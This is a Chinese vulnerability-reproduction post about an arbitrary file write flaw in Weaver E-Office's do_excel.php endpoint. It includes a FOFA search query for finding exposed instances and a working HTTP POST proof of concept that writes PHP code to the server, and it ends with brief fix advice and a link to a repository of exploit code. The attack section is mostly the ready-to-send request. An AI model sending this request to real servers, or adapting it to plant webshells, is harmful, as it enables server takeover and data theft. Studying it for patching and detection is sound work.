【漏洞复现】泛微OA E-Office do_excel.php 任意文件写入漏洞

》》》产品描述《《《

        泛微0-0fice是一款标准化的协同 OA办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。

---

》》》漏洞描述《《《

        泛微OAE-Ofice do exce.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验，攻击者可以通过构造特定的请求，将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件，如 WebShel 或系统脚本，从而在服务器上执行任意命令，访问敏感数据，甚至完全接管服务器。此漏洞严重威胁系统安全，可导致数据泄露、权限提升以及业务系统瘫痪等严重后果。

---

》》》搜索语句《《《

app="泛微-EOffice"

---

》》》漏洞复现《《《

POST /general/charge/charge_list/do_excel.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Connection: keep-alivehtml=<?php echo md5("1");unlink(__FILE__);?>

测试文件地址:/general/charge/charge list/excel.php
如果能解析php代码则存在漏洞

---

》》》修复建议《《《

1、如非必要，禁止公网访问该系统。
2、通过防火墙等安全设备设置访问策略，设置白名单访问。
3、升级产品到最新版本

---

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------